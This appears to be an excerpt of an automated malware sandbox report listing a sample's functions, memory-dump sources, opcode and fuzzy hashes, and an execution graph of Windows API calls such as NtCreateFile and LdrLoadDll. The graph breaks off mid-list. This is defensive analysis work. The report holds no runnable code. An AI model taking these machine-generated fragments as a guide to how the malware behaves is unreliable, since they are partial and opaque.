                                            • Snapshot File: hcaresult_2_2_4b30000_HHhHh.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 9cddee3ed94e931b2cad94e4bff70f9c7c1255f4f2f53a87955852d685d8f7c7
                                            • Instruction ID: 9e95289783d3dd4b1907cdf39403cad361816506990f4832994c494e535d58d2
                                            • Opcode Fuzzy Hash: 9cddee3ed94e931b2cad94e4bff70f9c7c1255f4f2f53a87955852d685d8f7c7
                                            • Instruction Fuzzy Hash: 52110FB6C003498FCB20CFAAC448A9EFBF4EB88310F10845AD428A7210D379A545CFA5
                                            Function 051CD0E8 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 051CD14D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 3f383176b3af89b2277ea5781c5c8f9524e83c9bd3747538b43e62e26214514a
                                            • Instruction ID: 9f786dc6c54621907d302723b3e9e467f2858f048cff4a596688577345337b72
                                            • Opcode Fuzzy Hash: 3f383176b3af89b2277ea5781c5c8f9524e83c9bd3747538b43e62e26214514a
                                            • Instruction Fuzzy Hash: B511F5B58043499FDB10DF99D489BDEFBF8FB48320F148459D518A3250D379A944CFA1
                                            Function 0245D4C4 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2149451191.000000000245D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0245D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_245d000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e4ce26f69d5209461144df284bf4ad34d1f0e892b1a69a6b9ac2e87f77a79015
                                            • Instruction ID: 1d53bbf80724851e9a6a48c786bedd5eac15432c9b9c3cded9ab338a0ab76a77
                                            • Opcode Fuzzy Hash: e4ce26f69d5209461144df284bf4ad34d1f0e892b1a69a6b9ac2e87f77a79015
                                            • Instruction Fuzzy Hash: 1D21C171904248EFDB15DF14D980B27BF65FF88318F24C56AED890A357C33AD456CAA2
                                            Function 0245D3D8 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2149451191.000000000245D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0245D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_245d000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be46551968aec06171c1ecd4c1fd511a91c79f199ed8851909237ce4819f9c13
                                            • Instruction ID: d06913989a2e1a205d3e88caf02810b387003e6b79afab3c9d7928624d3e172c
                                            • Opcode Fuzzy Hash: be46551968aec06171c1ecd4c1fd511a91c79f199ed8851909237ce4819f9c13
                                            • Instruction Fuzzy Hash: DC21B071904204DFDB09DF14D980B26BF65FF99324F24C56AED4A0A25BC33AE456CAA2
                                            Function 0246D1D4 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2149534438.000000000246D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0246D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_246d000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 809e934ed967a28a56e6845d175160f77992f67b9e0f3fcb6290180d10fb6b2a
                                            • Instruction ID: 27c83534ccb32aaea47b42130e6ec31568f180c7e350243541a123df198bb1c8
                                            • Opcode Fuzzy Hash: 809e934ed967a28a56e6845d175160f77992f67b9e0f3fcb6290180d10fb6b2a
                                            • Instruction Fuzzy Hash: 0921F271A04204EFDB05DF24D9C8B36BBA5FB88314F24C56EE9094F356C33AD846CA62
                                            Function 0246D01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2149534438.000000000246D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0246D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_246d000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0c8d8aead5fe0fd82d1ba268df06fd909192290e44c397aa56ab15e2aefc7604
                                            • Instruction ID: 90abdcacc4f8b368fee4ae9f7d286215a97f984b51390e65610a66dbba54a196
                                            • Opcode Fuzzy Hash: 0c8d8aead5fe0fd82d1ba268df06fd909192290e44c397aa56ab15e2aefc7604
                                            • Instruction Fuzzy Hash: 2521F575A04244DFDB14DF24D988B26BF65FB88318F24C56AD90A4B356C33BD447CAA2
                                            Function 0246D006 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2149534438.000000000246D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0246D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_246d000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eff7817ec03144d4ff7726d7ca9b2a958b15aac08e2359973f7afc569de8fadb
                                            • Instruction ID: 39616ebe0beadc55da7a3b116365f0b8c840b94599299697c1d7cb1c179b8fea
                                            • Opcode Fuzzy Hash: eff7817ec03144d4ff7726d7ca9b2a958b15aac08e2359973f7afc569de8fadb
                                            • Instruction Fuzzy Hash: 45215075509380CFDB16CF24D594716BF71EB46218F28C5DBD8898B6A7C33A940ACB62
                                            Function 0245D3D3 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2149451191.000000000245D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0245D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_245d000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction ID: 42ccc8bedf4bc1f00ff9603394eea1500f03723859e16479e9693e9bcff7613f
                                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction Fuzzy Hash: 2C11CD72804240CFDB06CF00D9C4B16BF62FB85224F24C6AADD490A257C33AE45ACBA2
                                            Function 0245D4BF Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2149451191.000000000245D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0245D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_245d000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction ID: 0e9245cee33369a0fd72deb6a4abc6e86100efc0c783e61256553ef1b1e0a266
                                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction Fuzzy Hash: 10119D76904284CFCB16CF14D9C4B16BF61FB88218F24C6AADD490B656C336D45ACBA2
                                            Function 0246D1CF Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2149534438.000000000246D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0246D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_246d000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction ID: f5999c7122a2200d193d27d0e2b9f56f79d5d0794269852e6fb1652180140a2b
                                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction Fuzzy Hash: 32118E75A04240DFDB16CF14D5C4B26BB61FB84214F28C6AAD8494F756C33AD44ACB62

                                            Non-executed Functions

                                            Function 051C85D8 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3b12f2ee153f913db3283582d5609e26d7e3802616adfbb5c71674c44e427ff9
                                            • Instruction ID: d10f143dd50256f01cdd776bbb43d6f3696e63b77a50a5b0f1aec606d5f05890
                                            • Opcode Fuzzy Hash: 3b12f2ee153f913db3283582d5609e26d7e3802616adfbb5c71674c44e427ff9
                                            • Instruction Fuzzy Hash: 8FE1EC74E042199FCB14DFA9C5809AEFBF2FF89305F248169D414AB35AD731A981CFA1
                                            Function 051C81A0 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 54d6510776d17aaefeb3ba8b6e26b91fd9eb971afc7c847a674f271407d734b9
                                            • Instruction ID: 03bf114fd474eba463b86a65035fed938302de2c5d891ce047b9bb8a72914bae
                                            • Opcode Fuzzy Hash: 54d6510776d17aaefeb3ba8b6e26b91fd9eb971afc7c847a674f271407d734b9
                                            • Instruction Fuzzy Hash: 1AE11B74E001199FCB14DFA9C5909AEFBB2FF89305F2491A9E414A735AD731AD81CFA0
                                            Function 051CA0B8 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 65841fd2ae385ff1ab134a754a237b0df1e6db0a743d5bb4ab792435250c4183
                                            • Instruction ID: 0bffd1a5a2d68698285ee988c6984fc38ac6e4a4d3277e05e738c8903e2be24c
                                            • Opcode Fuzzy Hash: 65841fd2ae385ff1ab134a754a237b0df1e6db0a743d5bb4ab792435250c4183
                                            • Instruction Fuzzy Hash: 48E12B74E001198FCB15DFA8C5809AEFBB2FF89305F2481A9E415A735AD731AD81CFA1
                                            Function 051C7D68 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 219b451729e8e6b10afd5a80202bb2b30583aab2d7714daef99d3fb3a4ba0ac5
                                            • Instruction ID: c8b8b4c30081e68c6e5cb55cf9e3f4ee9316089c08675719d117c7fed974fc1e
                                            • Opcode Fuzzy Hash: 219b451729e8e6b10afd5a80202bb2b30583aab2d7714daef99d3fb3a4ba0ac5
                                            • Instruction Fuzzy Hash: 84E10A74E041199FCB14DFA9C5809AEFBF2FF89305F2481A9E414A735AD731A981CFA1
                                            Function 051C9C80 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8d3d306059cf591b1ef841b71d6c2d5571e19b532663e1c0e91739388ddb16b0
                                            • Instruction ID: 98f253375ade86dcb90842e7dd565396884f2ba10101d22103e009018744c7f6
                                            • Opcode Fuzzy Hash: 8d3d306059cf591b1ef841b71d6c2d5571e19b532663e1c0e91739388ddb16b0
                                            • Instruction Fuzzy Hash: 42E1FA74E001198FCB14DFA9C5809AEFBB2FF89305F248169E415AB35AD731AD81CFA1
                                            Function 051C03F0 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cc02aa847c681a0710b871fe46eb891c1c106216a23945d3b9d4134a97ef221f
                                            • Instruction ID: 6b88c8c4d86225f9a2280fb81c739d7a2a2a81fe6d22d55aeed18394d8dd8cf5
                                            • Opcode Fuzzy Hash: cc02aa847c681a0710b871fe46eb891c1c106216a23945d3b9d4134a97ef221f
                                            • Instruction Fuzzy Hash: D6D10431D1076A8ADB11EF64DA50A9DB7B1EF95300F11D79AD10937224FBB0AAC9CF81
                                            Function 051C0400 Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cef03c56d700646715e1e44458c60db9397c4377cc0585736669fab01ec35473
                                            • Instruction ID: 2dcbdcccc86091afd1bc3151683bbe46ad94bf8994ec9dcd94d6a43b8a30e8c3
                                            • Opcode Fuzzy Hash: cef03c56d700646715e1e44458c60db9397c4377cc0585736669fab01ec35473
                                            • Instruction Fuzzy Hash: 1CD1F431D1066A8ADB11EFA4D950A9DB7B1FF95300F11D79AD10937214FBB0AAC9CF81
                                            Function 04B3D5DC Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2151370319.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4b30000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9bb3a9ad4a61718347b64c72032168de806b7d446f121fed3d68306f6c8017c9
                                            • Instruction ID: f644ab24b55a06f01a854b69b4fafaaa5f0b58c5e6f54c77dfc82711122dbd8c
                                            • Opcode Fuzzy Hash: 9bb3a9ad4a61718347b64c72032168de806b7d446f121fed3d68306f6c8017c9
                                            • Instruction Fuzzy Hash: A9A19036E00209CFCF05DFB6D9409AEB7B2FF85305B1585AAE801AB265DB75ED15CB40
                                            Function 051C9C70 Relevance: .2, Instructions: 165COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 97c52a57c763548897e6d4aebadf7d1e63aec7fa4aead3d390b196609bf93833
                                            • Instruction ID: 29f8b2122100bf793ed3ea26e580db59b70c13dd0ee65f316818343142a99313
                                            • Opcode Fuzzy Hash: 97c52a57c763548897e6d4aebadf7d1e63aec7fa4aead3d390b196609bf93833
                                            • Instruction Fuzzy Hash: 7D615E74E042198FDB15CF69C5845AEFBF2BF8A310F1481AAD408AB316D731A981CFA1
                                            Function 051C85C8 Relevance: .1, Instructions: 133COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 935f64e881775da9097befcbabb2437d4eb0a3ba926a93f193e5135fe43aa967
                                            • Instruction ID: b815f1e319bdb052116a19d2503fb167d0d5fe20c571b836daa323d3164d277a
                                            • Opcode Fuzzy Hash: 935f64e881775da9097befcbabb2437d4eb0a3ba926a93f193e5135fe43aa967
                                            • Instruction Fuzzy Hash: 2E512D74E042199FDB14DF69C5805AEFBF2BF89305F24C1A9D408AB356D7319941CFA1
                                            Function 051C8193 Relevance: .1, Instructions: 131COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e177a23f1e2cc22ecdfaf0545133ca085b4bdf25174355f1230f4ed20b563a5e
                                            • Instruction ID: 75626ac530d54b0e2fdf39710e4b40ad7e2164c235ecf1e62fcabc4a009bf219
                                            • Opcode Fuzzy Hash: e177a23f1e2cc22ecdfaf0545133ca085b4bdf25174355f1230f4ed20b563a5e
                                            • Instruction Fuzzy Hash: C2511C74E042199FDB14DFA9C5845AEFBF2BF89301F24C1A9D418A7316D7319942CFA1
                                            Function 051CA0A8 Relevance: .1, Instructions: 131COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b6cdd137065f44c9e9f3d14eaba1c447df9ecae09cb34537c24e2054ca89feb5
                                            • Instruction ID: 4b8772a84524fbca50af673a35794446f6d4d9b148ceebc5ede49a2e9d244411
                                            • Opcode Fuzzy Hash: b6cdd137065f44c9e9f3d14eaba1c447df9ecae09cb34537c24e2054ca89feb5
                                            • Instruction Fuzzy Hash: 77513A74E042198FCB15CFA9C5805AEFBF2BF89305F24C1A9D419AB316D7319A81CFA1
                                            Function 051C7D5B Relevance: .1, Instructions: 131COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf0675bbfb53011af6cf4143d5f75d3c7548d96fb511322fcaeab576968f142e
                                            • Instruction ID: d54e3532a3a199e23a23efa859234e57fd62777c7c97385b0706b42893ca1bec
                                            • Opcode Fuzzy Hash: bf0675bbfb53011af6cf4143d5f75d3c7548d96fb511322fcaeab576968f142e
                                            • Instruction Fuzzy Hash: 52512774E042198FCB14CFA9C5805AEFBF2FF89305F2481A9D418A7356D731A982CFA0

                                            Execution Graph

                                            Execution Coverage:1.5%
                                            Dynamic/Decrypted Code Coverage:2.8%
                                            Signature Coverage:5.7%
                                            Total number of Nodes:574
                                            Total number of Limit Nodes:67
                                            execution_graph 93062 41f0f0 93063 41f0fb 93062->93063 93065 41b970 93062->93065 93066 41b996 93065->93066 93073 409d40 93066->93073 93068 41b9a2 93069 41b9c3 93068->93069 93081 40c1c0 93068->93081 93069->93063 93071 41b9b5 93117 41a6b0 93071->93117 93120 409c90 93073->93120 93075 409d4d 93076 409d54 93075->93076 93134 409c30 93075->93134 93076->93068 93082 40c1e5 93081->93082 93556 40b1c0 93082->93556 93084 40c23c 93560 40ae40 93084->93560 93086 40c262 93116 40c4b3 93086->93116 93569 4143a0 93086->93569 93088 40c2a7 93088->93116 93572 408a60 93088->93572 93090 40c2eb 93090->93116 93579 41a500 93090->93579 93094 40c341 93095 40c348 93094->93095 93591 41a010 93094->93591 93096 41bdc0 2 API calls 93095->93096 93098 40c355 93096->93098 93098->93071 93099 40c385 93100 40c392 93099->93100 93103 40c3a2 93099->93103 93101 41bdc0 2 API calls 93100->93101 93102 40c399 93101->93102 93102->93071 93104 40f4a0 4 API calls 93103->93104 93105 40c416 93104->93105 93105->93095 93106 40c421 93105->93106 93107 41bdc0 2 API calls 93106->93107 93108 40c445 93107->93108 93600 41a060 93108->93600 93111 41a010 3 API calls 93112 40c480 93111->93112 93112->93116 93606 419e20 93112->93606 93115 41a6b0 2 API calls 93115->93116 93116->93071 93118 41af60 LdrLoadDll 93117->93118 93119 41a6cf ExitProcess 93118->93119 93119->93069 93153 418bc0 93120->93153 93124 409cb6 93124->93075 93125 409cac 93125->93124 93160 41b2b0 93125->93160 93127 409cf3 93127->93124 93171 409ab0 93127->93171 93129 409d13 93177 409620 LdrLoadDll 93129->93177 93131 409d25 93178 407d70 10 API calls 93131->93178 93133 409d2b 93133->93075 93531 41b5a0 93134->93531 93137 41b5a0 LdrLoadDll 93138 409c5b 93137->93138 93139 41b5a0 LdrLoadDll 93138->93139 93140 409c71 93139->93140 93141 40f180 93140->93141 93142 40f199 93141->93142 93539 40b040 93142->93539 93144 40f1ac 93543 41a1e0 93144->93543 93148 40f1fd 93151 41a490 2 API calls 93148->93151 93149 40f1d2 93149->93148 93549 41a260 93149->93549 93152 409d65 93151->93152 93152->93068 93154 418bcf 93153->93154 93179 414e50 93154->93179 93156 409ca3 93157 418a70 93156->93157 93185 41a600 93157->93185 93161 41b2c9 93160->93161 93192 414a50 93161->93192 93163 41b2e1 93164 41b2ea 93163->93164 93231 41b0f0 93163->93231 93164->93127 93166 41b2fe 93166->93164 93249 419f00 93166->93249 93174 409aca 93171->93174 93508 407ea0 93171->93508 93173 409ad1 93173->93129 93174->93173 93521 408160 93174->93521 93177->93131 93178->93133 93180 414e5e 93179->93180 93181 414e6a 93179->93181 93180->93181 93184 4152d0 LdrLoadDll 93180->93184 93181->93156 93183 414fbc 93183->93156 93184->93183 93188 41af60 93185->93188 93187 418a85 93187->93125 93189 41af70 93188->93189 93190 41af92 93188->93190 93191 414e50 LdrLoadDll 93189->93191 93190->93187 93191->93190 93193 414d85 93192->93193 93195 414a64 93192->93195 93193->93163 93195->93193 93257 419c50 93195->93257 93197 414b90 93260 41a360 93197->93260 93198 414b73 93318 41a460 LdrLoadDll 93198->93318 93201 414bb7 93203 41bdc0 2 API calls 93201->93203 93202 414b7d 93202->93163 93205 414bc3 93203->93205 93204 414d49 93207 41a490 2 API calls 93204->93207 93205->93202 93205->93204 93206 414d5f 93205->93206 93211 414c52 93205->93211 93327 414790 LdrLoadDll NtReadFile NtClose 93206->93327 93209 414d50 93207->93209 93209->93163 93210 414d72 93210->93163 93212 414cb9 93211->93212 93214 414c61 93211->93214 93212->93204 93213 414ccc 93212->93213 93320 41a2e0 93213->93320 93216 414c66 93214->93216 93217 414c7a 93214->93217 93319 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 93216->93319 93220 414c97 93217->93220 93221 414c7f 93217->93221 93220->93209 93276 414410 93220->93276 93264 4146f0 93221->93264 93223 414c70 93223->93163 93226 414d2c 93324 41a490 93226->93324 93227 414c8d 93227->93163 93228 414caf 93228->93163 93230 414d38 93230->93163 93232 41b101 93231->93232 93233 41b113 93232->93233 93345 41bd40 93232->93345 93233->93166 93235 41b134 93238 41b157 93235->93238 93348 414070 93235->93348 93237 41b180 93237->93166 93238->93237 93239 414070 3 API calls 93238->93239 93242 41b179 93239->93242 93241 41b20a 93243 41b21a 93241->93243 93474 41af00 LdrLoadDll 93241->93474 93242->93237 93380 415390 93242->93380 93390 41ad70 93243->93390 93246 41b248 93469 419ec0 93246->93469 93250 41af60 LdrLoadDll 93249->93250 93251 419f1c 93250->93251 93502 12d2c0a 93251->93502 93252 419f37 93254 41bdc0 93252->93254 93505 41a670 93254->93505 93256 41b359 93256->93127 93258 414b44 93257->93258 93259 41af60 LdrLoadDll 93257->93259 93258->93197 93258->93198 93258->93202 93259->93258 93261 41a37c NtCreateFile 93260->93261 93262 41af60 LdrLoadDll 93260->93262 93261->93201 93262->93261 93265 41470c 93264->93265 93266 41a2e0 LdrLoadDll 93265->93266 93267 41472d 93266->93267 93268 414734 93267->93268 93269 414748 93267->93269 93271 41a490 2 API calls 93268->93271 93270 41a490 2 API calls 93269->93270 93273 414751 93270->93273 93272 41473d 93271->93272 93272->93227 93328 41bfd0 LdrLoadDll RtlAllocateHeap 93273->93328 93275 41475c 93275->93227 93277 41445b 93276->93277 93278 41448e 93276->93278 93279 41a2e0 LdrLoadDll 93277->93279 93280 4145d9 93278->93280 93283 4144aa 93278->93283 93281 414476 93279->93281 93282 41a2e0 LdrLoadDll 93280->93282 93284 41a490 2 API calls 93281->93284 93288 4145f4 93282->93288 93285 41a2e0 LdrLoadDll 93283->93285 93286 41447f 93284->93286 93287 4144c5 93285->93287 93286->93228 93290 4144e1 93287->93290 93291 4144cc 93287->93291 93341 41a320 LdrLoadDll 93288->93341 93294 4144e6 93290->93294 93295 4144fc 93290->93295 93293 41a490 2 API calls 93291->93293 93292 41462e 93296 41a490 2 API calls 93292->93296 93297 4144d5 93293->93297 93298 41a490 2 API calls 93294->93298 93303 414501 93295->93303 93329 41bf90 93295->93329 93299 414639 93296->93299 93297->93228 93300 4144ef 93298->93300 93299->93228 93300->93228 93312 414513 93303->93312 93332 41a410 93303->93332 93304 414567 93305 41457e 93304->93305 93340 41a2a0 LdrLoadDll 93304->93340 93307 414585 93305->93307 93308 41459a 93305->93308 93310 41a490 2 API calls 93307->93310 93309 41a490 2 API calls 93308->93309 93311 4145a3 93309->93311 93310->93312 93313 4145cf 93311->93313 93335 41bb90 93311->93335 93312->93228 93313->93228 93315 4145ba 93316 41bdc0 2 API calls 93315->93316 93317 4145c3 93316->93317 93317->93228 93318->93202 93319->93223 93321 41af60 LdrLoadDll 93320->93321 93322 414d14 93321->93322 93323 41a320 LdrLoadDll 93322->93323 93323->93226 93325 41af60 LdrLoadDll 93324->93325 93326 41a4ac NtClose 93325->93326 93326->93230 93327->93210 93328->93275 93330 41bfa8 93329->93330 93342 41a630 93329->93342 93330->93303 93333 41af60 LdrLoadDll 93332->93333 93334 41a42c NtReadFile 93333->93334 93334->93304 93336 41bbb4 93335->93336 93337 41bb9d 93335->93337 93336->93315 93337->93336 93338 41bf90 2 API calls 93337->93338 93339 41bbcb 93338->93339 93339->93315 93340->93305 93341->93292 93343 41af60 LdrLoadDll 93342->93343 93344 41a64c RtlAllocateHeap 93343->93344 93344->93330 93475 41a540 93345->93475 93347 41bd6d 93347->93235 93349 414081 93348->93349 93350 414089 93348->93350 93349->93238 93379 41435c 93350->93379 93478 41cf30 93350->93478 93352 4140dd 93353 41cf30 2 API calls 93352->93353 93357 4140e8 93353->93357 93354 414136 93356 41cf30 2 API calls 93354->93356 93360 41414a 93356->93360 93357->93354 93358 41d060 3 API calls 93357->93358 93489 41cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 93357->93489 93358->93357 93359 4141a7 93361 41cf30 2 API calls 93359->93361 93360->93359 93483 41d060 93360->93483 93362 4141bd 93361->93362 93364 4141fa 93362->93364 93366 41d060 3 API calls 93362->93366 93365 41cf30 2 API calls 93364->93365 93367 414205 93365->93367 93366->93362 93368 41d060 3 API calls 93367->93368 93372 41423f 93367->93372 93368->93367 93370 414334 93491 41cf90 LdrLoadDll RtlFreeHeap 93370->93491 93490 41cf90 LdrLoadDll RtlFreeHeap 93372->93490 93373 41433e 93492 41cf90 LdrLoadDll RtlFreeHeap 93373->93492 93375 414348 93493 41cf90 LdrLoadDll RtlFreeHeap 93375->93493 93377 414352 93494 41cf90 LdrLoadDll RtlFreeHeap 93377->93494 93379->93238 93381 4153a1 93380->93381 93382 414a50 9 API calls 93381->93382 93384 4153b7 93382->93384 93383 41540a 93383->93241 93384->93383 93385 4153f2 93384->93385 93386 415405 93384->93386 93387 41bdc0 2 API calls 93385->93387 93388 41bdc0 2 API calls 93386->93388 93389 4153f7 93387->93389 93388->93383 93389->93241 93391 41ad84 93390->93391 93392 41ac30 LdrLoadDll 93390->93392 93495 41ac30 93391->93495 93392->93391 93394 41ad8d 93395 41ac30 LdrLoadDll 93394->93395 93396 41ad96 